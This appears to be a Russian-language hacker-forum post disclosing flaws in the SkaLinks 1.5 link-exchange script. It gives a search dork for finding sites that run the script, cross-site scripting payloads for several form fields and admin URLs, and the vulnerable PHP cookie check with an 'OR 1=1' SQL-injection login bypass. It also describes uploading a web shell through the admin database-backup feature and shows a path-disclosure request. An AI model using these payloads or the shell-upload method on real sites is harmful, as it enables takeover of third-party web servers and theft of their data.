Уязвимости SkaLinks - Link Exchange Script Product : SkaLinks Version : 1.5 Dork : Powered by SkaLinks Site: http://www.skalinks.com/ Founded by: Dimi4 Date : 29.01.09 Cross Site Scripting/vuln/skalinks_1_5/add_url.php Уязвимая переменная: link_url Пример запроса: Code: POST /vuln/skalinks_1_5/add_url.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Host: 127.0.0.1 User-Agent: Mozilla/4.0 Content-Length: 288 Connection: Close link_url="><script>alert()</script>&link_title=test&link_description=test&link_full_description=testtest&[email protected]&cat=1&Form_submitted=Submit%20Link&letter_id=4 Уязвимая переменная: link_full_description,link_description Code: link_full_description=</textarea><script>alert()</script> SQL-injection, BypassОбход авторизации в админке Бажная функция: PHP: function IsAdmin( ) { $table_name = $this->m_AdminsTable; $res = $this->db_Row( "SELECT * FROM `$table_name` WHERE `Name`='".$_COOKIE['adminname']."' AND `Password`='".$_COOKIE['pwd']."'"); if ( !$res ) { return 0; } else { return $res; } } http://127.0.0.1/VULN/skalinks_1_5/admin/ Admin name : 1' OR 1=1/* Cross Site Scripting in URI Code: http://127.0.0.1/vuln/skalinks_1_5/[COLOR=Red]admin/index.php/>"><script>alert()</script>[/COLOR] http://127.0.0.1//vuln/skalinks_1_5/[COLOR=Red]admin/register.php/>"><script>alert()</script> [/COLOR] http://127.0.0.1/vuln/skalinks_1_5/vuln/skalinks_1_5/[COLOR=Red]search.php/>"><script>alert()</script>[/COLOR] Способ заливки шелла Такой слособ прокатит только если криво выставлены права. Вообщем после удачного обхода авторизации, через дамп льем файл .htaccess. Содержимое: Code: allow from all . Ясен пень, при кривых правах файл перезапишется. Далее спокойно, через тот же бекап спокойно льем шелл (/admin/db_backup). Раскрытие путей Code: http://127.0.0.1/vuln/skalinks_1_5/search.php?url=test&Search=Search&search_type=URL
